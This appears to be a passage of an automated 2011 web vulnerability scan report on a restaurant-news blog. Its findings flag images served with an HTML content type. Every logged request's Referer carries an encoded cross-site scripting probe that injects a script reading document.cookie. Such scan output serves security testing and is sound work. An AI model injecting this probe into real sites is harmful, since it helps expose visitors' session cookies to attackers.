8.2. http://fastfood.ocregister.com/files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Sat, 03 Apr 2010 00:06:43 GMT
Cache-Control: max-age=271, must-revalidate
Content-Length: 9430
ETag: "d302a3a9d31b78291e19ca97cec5fe29"
Expires: Mon, 07 Apr 2014 05:14:10 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.3. http://fastfood.ocregister.com/files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 01 Jun 2010 05:07:10 GMT
Cache-Control: max-age=4, must-revalidate
Content-Length: 5325
ETag: "6ef4deef2933e046ddb42de2fc60ce28"
Expires: Mon, 07 Apr 2014 05:09:46 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.4. http://fastfood.ocregister.com/files/2010/09/Zagat_BestDining2011-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2010/09/Zagat_BestDining2011-150x112.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2010/09/Zagat_BestDining2011-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Wed, 29 Sep 2010 20:14:16 GMT
Cache-Control: max-age=271, must-revalidate
Content-Length: 6426
ETag: "c1b76bb3f270da7ba798d7c34603635a"
Expires: Mon, 07 Apr 2014 05:14:10 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.5. http://fastfood.ocregister.com/files/2010/12/FoodMontage-150x150.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2010/12/FoodMontage-150x150.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2010/12/FoodMontage-150x150.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 14 Dec 2010 19:44:02 GMT
Cache-Control: max-age=64, must-revalidate
Content-Length: 11782
ETag: "65f8b28c6976ce23a7ca668e2258efa0"
Expires: Mon, 07 Apr 2014 05:10:43 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.6. http://fastfood.ocregister.com/files/2010/12/blog_fastfood_mug_rh.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2010/12/blog_fastfood_mug_rh.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /files/2010/12/blog_fastfood_mug_rh.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Sat, 04 Dec 2010 00:20:30 GMT
Cache-Control: max-age=279, must-revalidate
Content-Length: 21753
ETag: "5a52c41c6eadc1a6e5ddfb3a05ebc2b8"
Expires: Mon, 07 Apr 2014 05:14:20 GMT
Content-Type: text/html

.PNG
.
...IHDR...M...g......0.v....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..T.IDATx...    .$.Y?..uvu...3;.;{...j%YF.u.....#..c........c..C....?G...`n.`..3`.... ..l....J{....=.ww.......r]].3{I
...[SNIP]...

8.7. http://fastfood.ocregister.com/files/2011/01/JWA-montage-150x64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/JWA-montage-150x64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2011/01/JWA-montage-150x64.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 13 Jan 2011 17:31:14 GMT
Cache-Control: max-age=78, must-revalidate
Content-Length: 6153
ETag: "e7dbb55e54c421f2605d8dd0375e9d1e"
Expires: Mon, 07 Apr 2014 05:10:58 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.8. http://fastfood.ocregister.com/files/2011/01/fastfood_cheapchic.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_cheapchic.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /files/2011/01/fastfood_cheapchic.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:14 GMT
Cache-Control: max-age=285, must-revalidate
Content-Length: 6180
ETag: "6cc789f7ca517658a0ed4081c3609214"
Expires: Mon, 07 Apr 2014 05:14:26 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]yl..u.{fggg..cI.R....D..d..e%V.#..8N`9A...8m.6...)...l.E..A.....a;H...    $v.X.-..)Q....x_{...}.G\....,.
...[SNIP]...

8.9. http://fastfood.ocregister.com/files/2011/01/fastfood_jack.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_jack.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /files/2011/01/fastfood_jack.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:15 GMT
Cache-Control: max-age=285, must-revalidate
Content-Length: 5487
ETag: "a5f9e8ce7d2aa539d761775c872c7b4f"
Expires: Mon, 07 Apr 2014 05:14:26 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]kp.....~.S....l..d......M*..    ..ZLe..ClRI.R    a.6..*......e..M\.e......@
..1...l..#.d    [...<{.q...s.a,...
...[SNIP]...

8.10. http://fastfood.ocregister.com/files/2011/01/fastfood_twitter.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_twitter.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /files/2011/01/fastfood_twitter.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:13 GMT
Cache-Control: max-age=279, must-revalidate
Content-Length: 5157
ETag: "2aa72ff1261eeba0b32dd0a1a40eeb85"
Expires: Mon, 07 Apr 2014 05:14:20 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]..UEz..s...w^0..y.n...L.,...Z.(....`i-nJ......[.J|..)e.b.UVY
   ......+...$*...e]..V'...y...O.....9s....
...[SNIP]...

8.11. http://fastfood.ocregister.com/files/2011/01/image001-300x245.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/image001-300x245.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2011/01/image001-300x245.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 27 Jan 2011 22:05:43 GMT
Cache-Control: max-age=283, must-revalidate
Content-Length: 25785
ETag: "13b09eac8231a23d01366445d0588f00"
Expires: Mon, 07 Apr 2014 05:14:22 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8.12. http://fastfood.ocregister.com/files/2011/01/taco_asylum_web-150x112.jpg  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/taco_asylum_web-150x112.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /files/2011/01/taco_asylum_web-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Wed, 12 Jan 2011 18:10:05 GMT
Cache-Control: max-age=78, must-revalidate
Content-Length: 8808
ETag: "7da605d47cb0f3ae45ece59afa6f5783"
Expires: Mon, 07 Apr 2014 05:10:59 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:30:07 CST 2011.